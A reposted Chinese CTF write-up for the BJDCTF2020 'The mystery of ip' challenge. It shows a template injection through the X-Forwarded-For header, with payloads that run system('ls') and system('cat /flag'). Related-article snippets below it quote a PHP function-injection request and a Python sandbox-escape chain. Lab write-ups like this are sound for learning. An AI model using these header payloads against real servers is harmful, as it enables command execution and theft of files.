[BJDCTF2020]The mystery of ip 1

news/2025/2/25 13:17:17/文章来源:https://www.cnblogs.com/tazmi/p/18565457

[BJDCTF2020]The mystery of ip 1

打开实例,发现flag.php路径,访问显示自己当前的内网ip

image-20241124091805543

hackerbar添加xff请求头,尝试ip伪造,成功回显

image-20241124091858569

判断可能为xff注入,尝试sql的部分注入语句均无效,放弃sql注入,尝试SSTI模板注入

X-Forwarded-For: {1+1}

image-20241124092302520

成功回显,存在XFF-SSTI模板注入漏洞

尝试构造payload

X-Forwarded-For: {system("ls")}

image-20241124092406046

成功遍历目录

查看flag.php,未发现flag

image-20241124092536880

查看根目录

X-Forwarded-For: {system("ls / -a")}

image-20241124092622528

发现flag,最终payload为:

X-Forwarded-For: {system("cat /flag")}

image-20241124092700153

flag{b0a840de-eeaf-4ed1-80c1-bb12ff2bcb10} 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/840273.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

[网鼎杯 2020 朱雀组]phpweb 1

[网鼎杯 2020 朱雀组]phpweb 1 打开实例,发现是个php页面,过了一会页面报错,发现参数func=date&p=Y-m-d h:i:s a看着像php传递函数执行的请求,尝试修改func为phpinfo func=phpinfo&p=Y-m-d h:i:s a可以看到参数被过滤了 采用highlight_file显示当前页面源代码,由于…

鸿蒙Next开发实战教程—电影app

最近忙忙活活写了不少教程,但是总感觉千篇一律,没什么意思,大家如果有感兴趣的项目可以私信给幽蓝君写一写。 今天分享一个电影App。这个项目也比较简单,主要是一些简单页面的开发和本地视频的播放以及横竖屏切换。 页面搭建以首页为例,很明显这是一个List页面,不过每一个…

担心360度评估结果隐私泄露怎么办?

当场惊呆!我们有个客户企业的hr反馈,公司内有领导的360评估结果分数比较垃垮。然后向下属施加淫威,从他们手里强制夺去手机看下面人给他的打分情况,毫无底线和节操。 古有邹忌讽齐王纳谏,今有360度评估,面对下属的反馈建议亦或批评,是打击报复还是接受批评与自我批评,…

.NET9 - 新功能体验(三)

.NET9和C#13引入Linq新方法CountBy和AggregateBy、序列化加强、Task.WhenEach方法、TimeSpan新重载、内置Swagger替换为Scalar,提升开发效率和代码可读性。书接上回,我们继续来聊聊.NET9和C#13带来的新变化。01、Linq新方法 CountBy 和 AggregateBy 引入了新的方法 CountBy 和…

用星球助手下载帖子的手把手教程

当我们想要把星球里的帖子和附件下载到本地电脑上慢慢学习时, 一篇一篇下载太麻烦了, 耗时且无聊. 用星球助手就非常方便啦. 打开软件后, 就是这样的界面.点击"新增", 输入星球名字和网页链接. 就像这样.最后, 就是点击"启动"开启一键下载了.帖子, 图片, 附…

通过学习先验增强基于流的生成超分辨率模型

通过学习先验增强基于流的生成超分辨率模型基于流的超分辨率(SR)模型在生成高质量图像方面表现出了惊人的能力。然而,这些方法在图像生成过程中遇到了一些挑战,例如网格伪影、爆炸反转以及由于采样温度不稳定而导致的次优结果。为了克服这些问题,这项工作在基于流的SR模型…

读数据质量管理:数据可靠性与数据质量问题解决之道13数据沿袭

数据沿袭1. 数据沿袭 1.1. MyDoom的病毒 1.2. 现在,许多团队甚至整个公司都在使用数据,这要求数据管理的方式要更便于合作,同时也更不容许发生错误 1.3. 从采用dbt和Apache Airflow等开源工具来实现数据转换和编排,到使用Snowflake和Databricks等云端数据仓库和数据湖 1.4.…

【开源系列】insightlake:免费使用的商业化数据安全平台

什么是 InsightLake 数据安全? 如今,企业将大量数据存储在数据湖和数据存储中以获取洞察力。同时,GDPR、萨班斯-奥克斯利法案、健康保险隐私及责任法案、巴塞尔协议 III 等法规也迫使企业保护敏感数据集并进行定期审计。不合规可能导致法律诉讼、声誉受损和业务损失。 这对企…

msiscan:一款针对msi文件的漏洞检测与识别工具

关于msiscan msiscan是一款针对Microsoft Windows *.msi 安装程序文件的漏洞检测与识别工具,该工具基于Python开发,可以用于获取安装程序的概述并识别潜在的安全问题。 需要注意的是,当前版本的msiscan正处于积极开发中,可能会存在假阳性和假阴性问题。 工具要求 Pythonter…

【python安全】python沙箱绕过的一些知识

python程序中有时候过滤了一些命令执行的关键字我们怎么去绕过呢? 最原始的方法(python3.7以下可以用魔术方法绕过) python2.7以下: .__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__[os].system(ls)python3.7以下: .__class__.__mro__[-1].__subclasse…

python 出图中文显示问题

增加一句 import matplotlib # 设置字体为系统中的中文字体(这里以SimHei为例,适用于Windows) matplotlib.rcParams[font.sans-serif] = [SimHei]import matplotlib.pyplot as pltimport matplotlib # 设置字体为系统中的中文字体(这里以SimHei为例,适用于Windows) matpl…